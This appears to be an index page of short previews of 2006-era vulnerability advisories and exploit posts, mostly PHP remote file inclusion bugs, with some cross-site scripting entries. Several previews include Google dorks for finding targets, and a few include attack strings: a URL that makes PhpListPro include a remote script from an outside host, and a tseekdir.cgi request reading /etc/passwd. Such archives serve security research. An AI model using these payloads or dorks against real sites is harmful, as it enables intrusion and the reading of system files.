TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion

DEVIL TEAM THE BEST POLISH TEAM TR Newsportal - Remote File Include Find by Kacper Rahim. Greetings For ALL DEVIL TEAM members, Special DragonHeart : Contact: [email protected] or http://www.devilteam.yum.pl dork: "TR Newsportal" brought by TRanx. extras/poll/poll.php: code /code...

ACal embed/day.php path Parameter Remote File Inclusion

The remote host is running ACal, an open source, web-based event calendar written in PHP. The version of ACal installed on the remote host fails to sanitize user-supplied input to the 'path' parameter of the 'embed/day.php' script before using it in PHP 'include' functions. Provided PHP's...

Ipswitch WhatsUp Professional 2006 - '/NmConsole/Navigation.asp?sDeviceView' Cross-Site Scripting

source: https://www.securityfocus.com/bid/17964/info WhatsUp Professional is prone to multiple input-validation vulnerabilities. The issues include remote file-include, information-disclosure, source-code disclosure, cross-site scripting, and input-validation vulnerabilities. These issues are due...

Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability

No description provided by source. DEVIL TEAM THE BEST POLISH TEAM Php Blue Dragon Platinum - Remote File Include Find by Kacper Rahim. Greetings For ALL DEVIL TEAM members, Special DragonHeart : dork: powered by Php Blue Dragon Platinum code // Szukanie u.ytkownika...

Ipswitch WhatsUp Professional 2006 - NmConsoleNavigation.asp?sDeviceView Cross-Site Scripting

Ipswitch WhatsUp Professional 2006 - NmConsoleNavigation.asp?sDeviceView Cross-Site Scripting source: https://www.securityfocus.com/bid/17964/info WhatsUp Professional is prone to multiple input-validation vulnerabilities. The issues include remote file-include, information-disclosure, source-cod...

Ipswitch WhatsUp Professional 2006 - NmConsoleToolResults.asp?sHostname Cross-Site Scripting

Ipswitch WhatsUp Professional 2006 - NmConsoleToolResults.asp?sHostname Cross-Site Scripting source: https://www.securityfocus.com/bid/17964/info WhatsUp Professional is prone to multiple input-validation vulnerabilities. The issues include remote file-include, information-disclosure, source-code...

Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability

Exploit for unknown platform in category web applications ============================================================ Php Blue Dragon CMS SessionData"SesUserLanguage"."/modprivmsg.".$phpExt; /code Fix: code // Szukanie u.ytkownika $vsDragonRootPath = "./";...

Ipswitch WhatsUp Professional 2006 - &#039;/NmConsole/ToolResults.asp?sHostname&#039; Cross-Site Scripting

source: https://www.securityfocus.com/bid/17964/info WhatsUp Professional is prone to multiple input-validation vulnerabilities. The issues include remote file-include, information-disclosure, source-code disclosure, cross-site scripting, and input-validation vulnerabilities. These issues are due...

Hackmaster Group DMCounter Remote File Include

Script: DMCounter Version: 0.9.2-b Language: PHP Problem: Remote File Include Vendor: http://Www.HackMaster.Us Discovered by: C-W-Mathackmasterdotus Description ============= Statistics software based on PHP which does not require any database support but just uses flat files. Daily + monthly...

PhpListPro 2.01 Remote File Include Vulnerability

Credits: Discovered by: SnoB - [email protected] http://www.cyber-security.org Vendor URL : SmartISoft http://smartisoft.com Dork/Search for: "PHPListPro ©2001-2006 SmartISoft" Exploit : /config.php?returnpath=http://www.example.com/yourscript.txt?&ls20-laF...

[slackware-security] Apache httpd redux

New Apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2, and -current to fix a bug with Apache 1.3.35 and glibc that breaks wildcards in Include directives. It may not occur with all versions of glibc, but it has been verified on -current using an Include within a file...

[MajorSecurity] phpListPro &lt;= 2.01 - Multiple Remote File Include Vulnerability

MajorSecurity phpListPro = 2.01 - Multiple Remote File Include Vulnerability -------------------------------------------------------- Software: phpListPro Version: =2.01 Type: Multiple Remote File Include Vulnerability Date: May, 8th 2006 Vendor: SmartISoft Page: http://smartisoft.com Risc: High...

[Kurdish Security # 5] phpRaid Remote File Include [SMF]

Kurdish Security Advisory phpRaid Remote File Include SMF : "Sosyalizim'de srar insan olmakta srardr" Abdullah Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com & [email protected] Risk : High Class : Remote Script : phpRaid Script Website : http://www.spiffyjr.com Version :...

phpRaid-1.txt

Kurdish Security Advisory phpRaid Remote File Include PHPBB : "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com & [email protected] Script : phpRaid Script Website : http://www.spiffyjr.com/ Version : phpRaid v2.9.5 "...

[Kurdish Security # 4] phpRaid Remote File Include Vulnerability &#40;PHPBB&#41;

Kurdish Security Advisory phpRaid Remote File Include PHPBB : "Sosyalizim'de srar insan olmakta srardr" Abdullah Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com & [email protected] Script : phpRaid Script Website : http://www.spiffyjr.com/ Version : phpRaid v2.9.5 " v3.0.b...

Claroline Open Source e-Learning 1.7.5 Remote File Include

Description Vendor: http://www.claroline.net The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable clarolineRepositorySys in a include function without being declared. There are other files vulnerable in the same folder, this exploit only attacks ldap.inc.php There is other...

tseekdir.cgi&lt;--Local File Include

---------------------------------- foud by: BoNy-m Site: http://www.alshmokh.com E-mail: [email protected] ---------------------------------- Search: allinurl:tseekdir.cgi example: /tseekdir.cgi?location=/etc/passwd00 /tseekdir.cgi?id=1055&location=/etc/passwd00...

ActualAnalyzer Server <= 8.23 (rf) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ==================================================================== ActualAnalyzer Server = 8.23 rf Remote File Include Vulnerability ==================================================================== Title: ActualAnalyzer Server =8.23 ...

phpListPro <= 2.01 Multiple Remote File Include Vulnerabilities

Exploit for unknown platform in category web applications =============================================================== phpListPro = 2.01 Multiple Remote File Include Vulnerabilities =============================================================== Title: phpListPro = 2.01 - Remote File Include...

ActualAnalyzer Server &lt;= 8.23 (rf) Remote File Include Vulnerability

No description provided by source. Title: ActualAnalyzer Server =8.23 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: ActualScripts URL: http://actualscripts.com ----------------------------------------------------------------- Credits...